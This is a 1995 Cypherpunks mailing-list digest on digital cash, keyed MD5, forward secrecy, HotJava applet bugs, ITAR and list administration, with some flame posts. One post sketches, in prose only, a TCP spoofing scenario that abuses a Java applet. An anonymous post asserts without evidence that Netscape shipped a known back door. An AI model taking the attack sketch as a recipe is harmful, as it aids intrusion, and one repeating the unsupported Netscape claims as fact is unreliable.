From ljo at ausys.se  Wed Nov  1 05:31:17 1995
From: ljo at ausys.se (Johansson Lars)
Date: Wed, 1 Nov 95 05:31:17 PST
Subject: (cpx) Digicash tagged with payee?
Message-ID: <95Nov1.143001gmt+0100.53766@void.ausys.se>




Hal Finney <hfinney at shell.portal.com> writes:

>I have heard it claimed that when you make a payment with Digicash ecash,
>the identity of the payee is encoded or embedded into the cash somehow.
>This is an anti-theft measure (among other things, perhaps).  The bank
>checks that the embedded identity in deposited cash matches the account
>name which is doing the deposit.

Where have you heard that? Everything I've heard from DigiCash seems
to indicate that no such "payee encoding" is performed.

>My question is, how could this be done?  How can the payor, at payment
>time, without communicating with the bank, embed a payee name
>irreversibly into the cash so that a thief cannot strip it out and
>replace it with his own name?

It is possible though with other (teoretical) protocols, such as Chaum,
Fiat and Naor's off-line cash scheme (briefly described in Schneirer's
book 'Applied Cryptography') and especially the (off-line) cash system,
developed by Stefan Brands.

In these systems, when Alice spends a coin at Bob's shop she has to
respond to a random challenge, sent to her by Bob. This random challenge
could possibly be a hash of Bob's identity and some other values.
My impression though is that this is not a feature of the current
implementation of ecash.

>Off-list there has been some discussion about the role of certificates in
>ecash, and in cash systems in general.  It would be interesting to know
>if this anti-theft provision of Digicash is actually provided by means of
>a certificate.

It is conceivable to think of the above mentioned methods in that way,  yes

/Lars Johansson
ljo at ausys.se






From perry at piermont.com  Wed Nov  1 08:51:42 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 1 Nov 95 08:51:42 PST
Subject: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <199511011651.LAA02027@jekyll.piermont.com>




Mr. Anonymous:
Why is this being sent to cypherpunks? Its totally irrelevant.

.pm

Anonymous writes:
> The Wall Street Journal, October 31, 1995, p. B6. 
> 
> 
> IBM Announces New Software Code That Is Universal
> 
> By Laurie Hays
> 
> 
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.
> 
> For software developers and businesses that want to develop
> one set of codes to run applications on many different
> machines, Microkernal offers an opportunity for the
> long-touted open computing. A big challenge remains, however:
> to market the technology and make a business case for software
> developers to write for Microkernal in a world that is
> dominated by Intel Corp. and Microsoft Corp.
> 
> "It's exciting technology, but it will be hard for them to
> market," says Dan Kuznetsky, an analyst with International
> Data Corp., a Framingham, Mass., market-research firm. "It's
> also got a long way to go from what they've announced to the
> future."
> 
> Mr. Kuznetsky likens the technology to the development of a
> great automobile transmission that has yet to be turned into
> a truck or a car.
> 
> The key to Microkernal is a single source code base that
> communicates between the hardware and the operating system.
> One long-term possibility, for example, would be to make the
> Apple Computer Inc.'s Maclntosh operating system work on an
> Intel PC, impossible today because the two have different
> design architectures that don't talk to each other.
> 
> IBM's delayed OS/2 operating system for the PowerPC chip,
> which is expected to be shipped by the end of the year, will
> be the first IBM offering for the Microkernal allowing
> developers to move applications to the chip with only small
> changes.
> 
> IBM so far has garnered a number of licensing agreements for
> Microkernal, including Digital Equipment Corp., Maynard,
> Mass., and LG Electronics, formerly the Korean electronics
> concern Goldstar, as well as a number of universities.
> 
> -----
> 
> 
> 
> 
> 
> 
> 
> 
> 





From ncra at ix.netcom.com  Wed Nov  1 13:31:34 1995
From: ncra at ix.netcom.com (NCRA )
Date: Wed, 1 Nov 95 13:31:34 PST
Subject: SCO Unix Crontab Problems-Need Help
Message-ID: <199511012132.NAA20695@ix2.ix.netcom.com>


I have a bourne shell that I need to execute in SCO unix 4.0 from a 
crontab.  The script is a communications upload using ecu.  The script 
runs just fine in terminal mode, but when it is executed in cron, it is 
not able to gain access of the modem for some reason.  

Q:  Is there something special that needs to be added to the crontab 
line in order to allow for tty access.  

Please let me know if you have any suggestions.





From fc at all.net  Wed Nov  1 02:35:42 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Wed, 1 Nov 1995 18:35:42 +0800
Subject: "Dr." Fred
In-Reply-To: <199511010235.DAA00908@utopia.hacktic.nl>
Message-ID: <9511011022.AA08641@all.net>


> The most charitable explanation for "Dr." Fred is that
> he's degenerated into the professional equivalent of
> those pathetic aging former chess masters who try to
> eek out a subsistence living by charging five bucks a
> game. People often play with them out of sympathy, or
> for the novelty of having lost to a past great. It's
> part of the chess culture, and it's basically harmless
> and sort of quaint.

Most of then could still beat your chess game.

> The difference, of course, is that its almost impossible
> to have sympathy for Dr. Fred. His hustle is for a hell
> of a lot more than subsistence. He was also never actually
> a master of his field, a fact that becomes increasingly
> obvious as our exposure to him goes on. Now he's reduced
> himself to trying to collect someone else's winnings.

Sour grapes, and from an anonymous poster too.  Oooo - I'm insulted.

I have been thinking about the issues of anonymity for some time, and I
have been convinced for some time that you can't have both integrity and
anonymity.  I thought there might be ways to accomplish this, but the
cypherpunks have convinced me it isn't true.  Show some integrity and
tell us who you are.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From jya at pipeline.com  Wed Nov  1 06:15:13 1995
From: jya at pipeline.com (John Young)
Date: Wed, 1 Nov 1995 22:15:13 +0800
Subject: OH?_bob
Message-ID: <199511011354.IAA27676@pipe1.nyc.pipeline.com>


   11-1-95. NYPaper, Page One lead:


   "C.I.A. Tells Panel It Failed To Sift Spy Data.
   Disinformation May Have Led to Spending for Illusionary
   Perils."

      The C.I.A. admitted today that it knowingly gave the
      White House and the Pentagon inside information on the
      Soviet Union without warning that it came from foreign
      agents it knew or strongly suspected were controlled by
      Moscow. The information may have affected decisions to
      spend billions of dollars on military hardware. Even
      when the agency knew or suspected that its sources were
      double agents it never warned that its inside
      information was tainted. The agency thought it more
      important to protect its suspect Soviet sources than to
      tell the nation's leaders the truth. That disclosure
      threatens the C.I.A.'s foundation; its central mission
      is to speak the truth to those in power. "Something has
      gone terribly wrong," Senator Bob Kerrey said.


   OH?_bob  (8 kb)












From perry at piermont.com  Wed Nov  1 06:25:17 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 1 Nov 1995 22:25:17 +0800
Subject: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <9510312015.AA00768@zorch.w3.org>
Message-ID: <199511011359.IAA01892@jekyll.piermont.com>



hallam at w3.org writes:
> 
> >A keyed version of MD5 is the base authentication mechanism in IPSP
> >and it has been heavily examined by a number of very good
> >cryptographers.
> 
> Yes we reviewed it and said that it sucked.
> 
> Phil wrote a note to Ron and Ron sent in a series of comments.

Phil was complaining largely because in spite of his apparent
cryptography credentials he's a lughead who can't have been bothered
to understand the architecture -- most of his comments reflected a
general ignorance of the process and of the discussions that had
preceeded. He also complained that the transforms weren't sufficiently
generic for his tastes. However, no complaints AT ALL were made about
Hugo's selection of cryptographic transform. We were assured by
everyone that it was the right thing to do, with people swearing up
and down that it was the appropriate idea. Do you want me to extract
the mailing list archives? Every last posting on this topic is on
line.

> The sequence of events I heard was that they asked Burt Kaliski for
> a suggestion, he gave them one and they chose something different.

Actually, Kaliski made an off-the-cuff suggestion that all the other
crypto folks ripped apart, largely because it was obvious even to me
how it could be attacked, and then he backed off.

Perry





From anon-remailer at utopia.hacktic.nl  Wed Nov  1 07:30:55 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Wed, 1 Nov 1995 23:30:55 +0800
Subject: No Subject
Message-ID: <199511011445.PAA13294@utopia.hacktic.nl>


On Tue, 31 Oct 1995, Anonymous wrote:

> Wall Street Journal, October 30, 1995, p. B3.

> Brad Meinert, senior analyst at research firm Input, says the
> tremendous growth of the World Wide Web, a graphics Internet
> interface, "is putting increased capacity demands for greater
> bandwidth on the Internet infrastructure."

I see our media friends are just as clueful as ever .... graphics 
Internet interface ??  Thats almost as bad as saying "Come visit our 
Internet Site" when they mean Web site !!














From anonymous-remailer at shell.portal.com  Wed Nov  1 07:39:19 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 1 Nov 1995 23:39:19 +0800
Subject: US government department for crime enforcement!
Message-ID: <199511011440.GAA23008@jobe.shell.portal.com>


It's come to my attention that the US government has a group
called the 'Department of the Treasury Financial Crimes 
Enforcement Network' in Vienna, Virginia.

I know that burocrats like to keep themselves busy, but even 
I didn't think they would go so far as to enforce crimes to 
keep the law enforcement people busy.

What a curious way to spend the taxpayers money.

Garfield

P.S. :-) for the humor impaired.







From todd at lgt.com  Wed Nov  1 08:13:30 1995
From: todd at lgt.com (Todd Glassey)
Date: Thu, 2 Nov 1995 00:13:30 +0800
Subject: Please send cash
Message-ID: <v02110100acbd41b59c95@[204.156.156.4]>


Yo Fred, nobody said you wer not right on the money, just that these issues
clearly have fixes and are part and parcel to a pre-adolesencent product,
not a mature one.

Yes, you get two points for posting the bug report, but lose one for
soap-boxing about the woes of the product in general... Keep up the good
work, just drop the proslitizing and we all wouldn't mind hearing your rap.


BTW - If your or your friends are up for a game of speed-chess... I'm
willing, I used to be *rated* until I dropped off the circuit a few years
ago... Winged Benoni, Classical Ruy, or maybe an Accellerated Dragon (for
those who play the black)... I won't even charge you the nominal 5$ fee...

>I just picked this up from the Risks forum:
>
>> Date: Mon, 30 Oct 1995 16:14:59 -0500
>> From: Drew Dean <ddean at CS.Princeton.EDU>
>> Subject: HotJava 1.0 alpha 3 security issues
>>
>> We have found several security problems in the 1.0 alpha 3 release of
>> HotJava from Sun Microsystems.  The two most important problems are that
>> HotJava does not enforce the stated limits on where an applet can connect to
>> (an applet can talk to any place with which you have IP-level connectivity),
>> and HotJava is vulnerable to a man-in-the-middle attack, where someone can
>> watch your web-surfing, both seeing your requests, and the content that you
>> receive.
>
>Two of the Java attacks I outlined in this forum and got abuse for.
>
>> While HotJava prevents applets from actively opening connections that
>> violate the user-selected security policy, it allows an applet to accept
>> connections from anywhere.  At this point, an applet only has to use any one
>> of a number of channels to communicate where it is, and have the remote end
>> do the active open.
>>
>> HotJava also allows an applet to set the proxy servers that the browser
>> uses.  This opens up a huge hole for anyone concerned about the privacy of
>> their web surfing.
>
>Attacks 31-49 work here.
>
>> Please note that these bugs are specific to the 1.0 alpha 3 release, and are
>> _not_ bugs in the Java language itself, nor do they apply to Netscape 2.0
>> beta 1J, which doesn't permit network connections.  We have notified Sun of
>> these problems, and are presently writing a paper on these and other issues.
>> We will make more information available on our Web page after we hear back
>> from Sun.
>
>Drat - Sun doesn't offer awards.
>
>>
>>     http://www.cs.princeton.edu/~ddean/java/
>>
>> Drew Dean                             Dan Wallach
>> ddean at cs.princeton.edu                        dwallach at cs.princeton.edu
>
>Inquiring minds want to know.
>
>--
>-> See: Info-Sec Heaven at URL http://all.net
>Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd at lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----







From todd at lgt.com  Wed Nov  1 08:42:28 1995
From: todd at lgt.com (Todd Glassey)
Date: Thu, 2 Nov 1995 00:42:28 +0800
Subject: Please send cash
Message-ID: <v02110102acbd48783387@[204.156.156.4]>


>> While HotJava prevents applets from actively opening connections that
>> violate the user-selected security policy, it allows an applet to accept
>> connections from anywhere.  At this point, an applet only has to use any one
>> of a number of channels to communicate where it is, and have the remote end
>> do the active open.
>
>What if I start a Java applet then send it a faked TCP/IP packet from another
>host? Can I hotwire an outgoing connection that appears to be from the victim
>host?
>
>TCP/IP connections are not really all that directed. It is only the startup
>phase that is trully directed - someone has to start a conversation.
>
>Planned sequence of events :
>
>Mallet:
>        Send out Java applet to Alice
>        Send Bob a connection request packet on port 22
>        Alice's Java applet is accepting connections.
>        Send Alice a "request" packet claiming to come from port 22
>        Should now have an outgoing connection.
>
>???? I'm not a TCP/IP hacker (much). I'll ask our guru tommorow after we
>are done with the NSA.
>
>
>                Phill


For the most part this scenario would work. The Java Applett that is doing
secure or authenticated work clearly must employ some form of embedded
authenticatation.

A cute trick we are employing in one applet under development here at LGT
is an embedded stream based bi-directional encryption engine. It provides a
direct mechanism to encrypt the data stream within the TCP datagram rather
than outside of it. Since the datagram itself is untouched the simple
interface that Java employs is unfettered. However this proces adds some
performance overhead but allows for a virtual private network to be
constructed directly from the server to the applet context.

This project/concept will be released sometime in January along with some
underpinnings to plug into the FSTC EPayment Handler and its Architecture
along with the applett itself... Yes we will share it with the
CypherPunks... It's the best way I know to get a public testing/err bashing
and beta cycle on a concept.,

We really are not trying to build a product in this effort, rather the
intent  is to prove that although the general "external transport" is/may
be unsecured, that the internal or upper layers do not necessarily suffer
from the same security leakage or process models, and that secure
transactions can successfully be layered upon these "existing"
underpinnings if they are adapted properly.

This is especially true with both HiJacking and Spoofing attack modalities.
But in our model with the upper layers events are synchronized and
validated such that there is little chance for these attack modalities to
succeed.

Again for the world to hear - The Java concept is a Transport Harness, not
the entire magilla. Clearly that is what is going on here... Without thewse
upper layers it is no safer than normal netscape or any other browser
transport.

Sincereley,

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd at lgt.com

(415) 324-4318


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----







From perry at piermont.com  Wed Nov  1 09:06:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 2 Nov 1995 01:06:05 +0800
Subject: Perfect Forward Secrecy - is it worth it?
In-Reply-To: <Pine.SOL.3.91.951031141506.1151H-100000@chivalry>
Message-ID: <199511011619.LAA01986@jekyll.piermont.com>



Simon Spero writes:
> Quick survey; how important is perfect forward secrecy to you?

Very. It makes one's life far easier. It makes protecting historical
traffic easy. Its a wonderful feature for a cryptosystem.

> In general, schemes offering PFS require a extra PK-op, and an extra 
> round-trip when compared to  non-PFS schemes. This cost is incurred once 
> per "session", but can add on the order of seconds to startup times. 

Well, things aren't that bad if you use eliptic curve variants on D-H,
or if you are very careful. See Phil Karn's work on this for Photuris...

Perry





From baldwin at RSA.COM  Wed Nov  1 10:20:14 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Thu, 2 Nov 1995 02:20:14 +0800
Subject: Rivest on the Design of RC4
Message-ID: <9510018152.AA815247765@snail.rsa.com>


        Professor Ron Rivest will be presenting a talk titled
"The Design of RC4" at the RSA Data Security Conference in San Francisco
(January 17 to 19).  It should be interesting.
                --Bob






From asgaard at sos.sll.se  Wed Nov  1 10:22:38 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Thu, 2 Nov 1995 02:22:38 +0800
Subject: New release of CFS...
In-Reply-To: <m0tAfXb-0002duC@horten>
Message-ID: <Pine.HPP.3.91.951101180307.29374A-100000@cor.sos.sll.se>


Andreas Bogk wrote:

> Please report any leakage of this software immediately to this list.

Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz

Mats






From sunder at amanda.dorsai.org  Wed Nov  1 10:29:09 1995
From: sunder at amanda.dorsai.org (Ray Arachelian)
Date: Thu, 2 Nov 1995 02:29:09 +0800
Subject: [ADMIN] Re: Welcome to cypherpunks
In-Reply-To: <9510260118.AA07260@toad.com>
Message-ID: <Pine.SUN.3.91.951101122248.25318F-100000@amanda.dorsai.org>


On Wed, 25 Oct 1995, John Gilmore wrote:

> It's true, for a period of about 45 minutes today, someone subscribed
> the Cypherpunks list to itself.  This resulted in a small number of
> looped messages.
> 
> Also in today's bogus news, a rather testy newbie, Arthur Germain,
> subscribed at 8AM Tuesday.  He had unsubscribed by 3PM Tuesday, but
> when he got another twenty or thirty messages (that had been sent to
> cypherpunks while he was a subscriber, but which hadn't reached him
> yet), he forwarded each of them back to the mailing list.  You may or
> may not have seen some of these; I killed off further distribution.

Perhaps we can prevent this sort of thing by putting a signature in each 
message as majordomo sends it, say some X-Majordomo-Sent-Already header 
line?  Then when majordomo reads an incoming message it would look for 
that text in both the header and the body, and upon finding it, would 
discard the message.

This would work because removing such a line in order to get majordomo to 
choke would mean either writing code, or doing it manually.  If 
cypherpunks is subscribed to itself, it's easy for majordomo to not 
accept cypherpunks at toad.com as a subscriber.  But if someone forwards a 
message or many back to the list, they'd vanish.

One of the nicer things about FidoNet (perhaps the only one) is that once 
a system receives a message, it adds a signature in the hidden area 
called "seen by" with it's node number.  If Majordomo did that, it would 
know it sent that message already...

Not much of a fix, but a nice-to-do kind of fix. :-)


==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder at dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================






From s1113645 at tesla.cc.uottawa.ca  Wed Nov  1 15:31:40 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 2 Nov 1995 07:31:40 +0800
Subject: US government department for crime enforcement!
In-Reply-To: <199511011440.GAA23008@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511011736.B46528-0100000@tesla.cc.uottawa.ca>




On Wed, 1 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> It's come to my attention that the US government has a group
> called the 'Department of the Treasury Financial Crimes 
> Enforcement Network' in Vienna, Virginia.
> 
Yeah, in case you're interested, Anon, Wired had an article on them,
I think in 1.2, the cypherpunks issue. It might also be in their privacy 
archive. Fincen has webpages at 
www.ustreas.gov/treasury/bureaus/fincen/fincen.html

The agency is pretty much an alternative to the IRS's crumbling computers
and a nice cover for possibly unapproved interagency cooperation.
Look up some recent posts by Douglas Barnes on a banking conference.

Sorry to repeat what's been said here a zillion times before.

This account is a remailer for bad terminal servers. The above opinions are 
entirely the result of line noise. @#$#@$~%?!!






From shields at tembel.org  Wed Nov  1 15:42:17 1995
From: shields at tembel.org (Michael Shields)
Date: Thu, 2 Nov 1995 07:42:17 +0800
Subject: "Dr." Fred
In-Reply-To: <199511010235.DAA00908@utopia.hacktic.nl>
Message-ID: <478lic$vv@yage.tembel.org>


In article <199511010235.DAA00908 at utopia.hacktic.nl>,
Anonymous <anon-remailer at utopia.hacktic.nl> wrote:
> The difference, of course, is that its almost impossible
> to have sympathy for Dr. Fred. His hustle is for a hell
> of a lot more than subsistence. He was also never actually
> a master of his field, a fact that becomes increasingly
> obvious as our exposure to him goes on. Now he's reduced
> himself to trying to collect someone else's winnings.

So, what part of your analogy was valid?
-- 
Shields.





From baldwin at RSA.COM  Wed Nov  1 16:15:16 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Thu, 2 Nov 1995 08:15:16 +0800
Subject: Keyed-MD5, and HTTP-NG
Message-ID: <9510018152.AA815258328@snail.rsa.com>


Perry,
        I personally spoke to Bill Simpson about this problem.  I should have
given you a phone call or email in addition to speaking to Bill.  In my
opinion this problem does not at all reflect on your skills or reputation.
What it signifies to me is the poor state of cryptographic engineering.
If anything, it points out the wisdom of the IPsec designers in requiring
that key material have a limited lifetime.  A wise engineering choice like
this protects the system against many different kinds of attacks.  Of course,
the protocol implementors often omit "details" like key lifetime limits.
In fact, 17 years ago when I wrote a TCP/IP stack for the Xerox Alto I left
out several "details", which of course caused lots of problems when I
did interoperability testing with a mainframe (Multics).
                --Bob


______________________________ Reply Separator _________________________________

On 11/1/95 10:20 AM, perry at piermont.com worte:

> There were two names on the MD5 document -- mine and Bill
> Simpson's. Bill didn't tell me that he was called (I suspect he 
> would have), and I wasn't called, either. We were the only two 
> editors of that portion of the specification.
> 
> Given that my name was on that document and that I made a large effort to 
> try to make sure that people examined the algorithms and thought they were 
> good, and that I have some of my reputation tied to that document, I am 
> rather unhappy at the fact that I only find out third hand about what people 
> in the field have determined about our selected algorithm.







From shields at tembel.org  Wed Nov  1 16:31:10 1995
From: shields at tembel.org (Michael Shields)
Date: Thu, 2 Nov 1995 08:31:10 +0800
Subject: IBM's Microkernal
In-Reply-To: <199511010122.CAA29490@utopia.hacktic.nl>
Message-ID: <478k8o$gp@yage.tembel.org>


In article <199511010122.CAA29490 at utopia.hacktic.nl>,
Anonymous <nobody at REPLAY.COM> wrote:
> International Business Machines Corp., in its effort to reduce
> the importance of computer-operating systems, announced a new
> kind of universal-software code called Microkernal that
> enables software to work on incompatible hardware.

Impressive!  I wonder if it works without using algorithms.
-- 
Shields.





From anonymous-remailer at shell.portal.com  Wed Nov  1 16:42:04 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 2 Nov 1995 08:42:04 +0800
Subject: The cost of ITAR
Message-ID: <199511012336.PAA16268@jobe.shell.portal.com>


> Here's the problem:  Because the US government has outlawed the export of
> industrial-strength encryption, firms seeking to do business abroad find 
> themselves without trustworthy security options once they leave US 
> boundaries.  How can companies in the information and networking 
> business, such as Sun Microsystems, possibly sell a system to Alcatel in 
> France, for example, if the encryption that accompanies it can be broken 
> by a 14-year-old with too much time on his or her hands?  They can't.  So 
> Sun came up with a novel solution: buy Russian.  The Soviets may have 
> sucked at cars and strip malls, but they sure as hell knew their 
> cryptography.  "The Russians can make any kind of encryption you want" 
> says Geoffrey Baehr chief network officer at Sun.  And what can the US 
> government do about a product developed outside its borders?  Nothing.

Actually the US government and US industry generally does not follow any
coherent industrial development policy of which ITAR is but one single
part. There is almost a jingoistic belief in the "free market"  with a
concomitant commitment to a strong American individualism.  While this
may function domestically, it certainly does not function internationally. 

The US continues to cede entire industries through poor economic and trade
policy.  I guess, nothing was learned with Boeing and Airbus. 

ITAR regulations will simply lock-out US companies from foreign markets,
and this combined with "competition" rather than "co-operation" will allow
foreign firms to divide and conquer American firms.  Foreigners generally
don't trust "American" as it is. 

Historically, the US has deliberately sold inferior security products
while making representations that they were in fact secure.  While this
*might* work on unsuspecting civilians, internationally it just doesn't
pass the giggle test, and won't allow a US firm to even make the bid list 
outside their own borders in the not too distant future.

US companies will loose the entire international market, unless they begin
to think globally.  Non-legislated trade lockouts based on Nationalism are
extremely difficult to overcome. 

> In fact, Sun was so taken with Russia's computing talent that the company 
> recently hired the entire team once responsible for the next generation 
> of Soviet supercomputers (and the Russians brought along the plans for 
> the beasts).  Ask Sun chief scientist John Gage if he'd rely on 
> US-approved encryption to send those plans between Moscow and California, 
> and he'll laugh out loud.  "We can't rely on that stuff.  We're talkling 
> trade secrets here!" - John Battelle

While John Gage, may laugh out loud, it is actually a very serious matter.
Trade secrets are not for laughter.  

As an example, what value is access to Pacific Gas's LAN??  Let's suppose
that Pacific Gas could be compromised because of poor security or
encryption -- a compromise which occurs as a result of some user
installing a commercial web-browser which had a well-known "back door", a
browser like the Netscape product. 

What would be the fallout from this??

Maybe (domestically), Pacific Gas customers might not be _happy_ that
PGT's market book was given over to CAPP, and that foreign producers knew
*exactly* what Californian's Natural Gas open interest was in advance on a
real time basis.  And that CAPP, hypothetically, has used and continues to
use that information in trading on Natural Gas markets, which results in
all Californians paying a 30% premium on their utility bills. 

Would this be a laughing matter??  

Who would laugh if natural gas prices were up (as they in fact are) 
25 - 30% at the trading hub AECO-C? 

And while PGT might ignore daisy chaining, and advance the argument that
the hole was at NGX -- rather than at PGT, or maybe that the hole was
because a client of NGX installed a copy of Navigator 1.1 somewhere, how
far would the laughter carry??  Especially the laughter at the keystone
cop finger pointing?? 

Around the world, maybe?

The idea of a foreign group of producers positioning themselves through
high-tech scouting by taking advantage of the shoddy design of a "Made in
America" product so that they could indirectly tax the citizens of
California is _truly_ a laughing matter.  Trivial in fact.

The uproar of a class action suit by all the customers of PGT would be but
a small nuisance within the context of the international fallout.  

Laughter will not be on the lips of US executives when it becomes known
that the security flaw in Navigator 1.1 was "well and widely known" within
the US software, hardware and security industry, and that ALL members 
of kept quiet about and around it. 

There will be little laughter at the catastrophic trade fallout if it is
demonstrable (as it was) that a US multi-billion dollar company knowingly
distributed a program which functions as a virus delivery vehicle, and
that all US industry members decided that their "industrial policy" 
dictated that they would not step forward and speak out. 

There will be very little laughter amongst shareholders and directors 
when they become aware that not only were entire markets sacrificed to 
"keep the secret" but that the entire US economy was put at risk.
 
Good-bye international markets -- not just for the said billion dollar 
company -- but for all members of the industry who domicile in the US.  

> This looks like a striking example of regulatory arbitrage at work, and 
> if it can be confirmed in its details ought to be an extremely powerful 
> anecdote in the hands of those working against GAK and ITAR.
>
> The sucking sound is American jobs heading overseas, 
> the snorting sound is American trade-secrets being sniffed up 
>     by foriegn competitiors, 

Yep, and it's not even a question of someone else causing this.  This is 
US citizens, and US companies having a limited experience and view in 
international trade, and that very inexperience leading to their OWN 
creation of these problems.  Has anyone considered GISA in all of this?
Probably not.

As an example, I contacted AT&T, regarding the Netscape flaw which was
posted to the Internet on Friday the Thirteenth -- the flaw that Netscape
had "no comment" on.  I asked for AT&T commentary, since they were selling
the Netscape product under their own brand.  I also asked for referral to
their Security Officer, rather than their Public Relations people. 

AT&T's response??

    "...I am not sure that our security officers are up to it.  Often 
    AT&T just repackages an external product, without opening it or 
    understanding it.  My guess is that the corporation is likely to 
    simply trust the netscape folks unless an actual hole can be  
    demonstrated."

And with that, there's 'nuff said ...

> Maybe the FBI's responsibility for US counter-intelligence is meant as a 
> double-entendre?

I guess getting shot by friendly fire does sound better than saying that
you're shooting yourself in the foot.  Don't it?? 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.












From hallam at w3.org  Wed Nov  1 17:28:57 1995
From: hallam at w3.org (hallam at w3.org)
Date: Thu, 2 Nov 1995 09:28:57 +0800
Subject: Keyed-MD5, ITAR, and HTTP-NG
In-Reply-To: <Pine.SOL.3.91.951030101221.319D-100000@chivalry>
Message-ID: <9510302351.AA28243@zorch.w3.org>



Simon,

	Do not spec Keyed MD5, it is a complete looser. It is actually weak
against a number of attacks. There are much better constructs for creating
a keyed digest. There are much better ways of creating a digest than using
a hash fuinction as the base.

	There is some work by Phil Rogaway on making keyed digest functions
which I strongly recommend people look at. I can post a paper on the subject if 
people are interested.

		Phill





From andrew_loewenstern at il.us.swissbank.com  Wed Nov  1 17:29:16 1995
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Thu, 2 Nov 1995 09:29:16 +0800
Subject: S. 1284 To Amend (C) Act
Message-ID: <9510302258.AA00471@ch1d157nwk>


>  S. 1284,  s1201:  "No person shall import, manufacture or distribute
>  any device, product, or component incorporated into a device or
>  product, or offer or perform any service, the primary purpose or
>  effect of which is to avoid, bypass, remove, deactivate, or otherwise
>  circumvent, without the authority of the copyright owner or the
>  law, any process, treatement, mechanism or system which prevents
>  or inhibits the violation of any of the exclusive rights of the
>  copyright owner under section 106."

IANAL, but I thought these types of laws were already tested and deemed  
unconstitutional in cases involving video-tape copying boxes, dual video  
cassette dubbing decks, SCMS 'scrubbers', etc...


andrew





From futplex at pseudonym.com  Wed Nov  1 17:44:50 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 2 Nov 1995 09:44:50 +0800
Subject: [FRED] Anonymity and Integrity
In-Reply-To: <9511011022.AA08641@all.net>
Message-ID: <199511011907.OAA16631@opine.cs.umass.edu>


My turn to rise to the bait...

Dr. Frederick B. Cohen writes:
> I have been thinking about the issues of anonymity for some time, and I
> have been convinced for some time that you can't have both integrity and
> anonymity.  

What's your working definition of "integrity" in this context ?

-Futplex <futplex at pseudonym.com>
"Once anonymous, twice pseudonymous"





From perry at alpha.jpunix.com  Wed Nov  1 18:16:45 1995
From: perry at alpha.jpunix.com (John A. Perry)
Date: Thu, 2 Nov 1995 10:16:45 +0800
Subject: Birds of a Feather...
Message-ID: <Pine.BSD.3.91.951101130010.807B-100000@alpha.jpunix.com>


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

	Some of us are going to USENIX in January. If you want to discuss 
like interests for this event, I've opened #remailop on IRC on DALnet. 
Need a server? irc.phoenix.net.. See ya there!!

 John Perry - KG5RG - perry at alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry at jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMJfE0VOTpEThrthvAQEbRAP9FIB0IoyPjm2QNNj4JQADqfbOysotX0hH
JPINLylbhbSVtM9wxiS4PZPtqSdJZINujXIi4S3nXeUkIlYHMhQQRUxNT79RMiUu
Zp8uaiMmryAlJGeJ+wBpWNCuB7rtuYq5/p7dPBWmtLtKkiEedS4SDXxvZAc/P7my
2Me0/8xjq5E=
=ca8i
-----END PGP SIGNATURE-----





From perry at piermont.com  Wed Nov  1 18:18:31 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 2 Nov 1995 10:18:31 +0800
Subject: Keyed-MD5, and HTTP-NG
In-Reply-To: <9511020101.AA05060@zorch.w3.org>
Message-ID: <199511020123.UAA02652@jekyll.piermont.com>



hallam at w3.org writes:
> This appears to have been a problem from both ends. A number of
> people arround here only heard about the IPsec work when it had
> reached the final call phase.

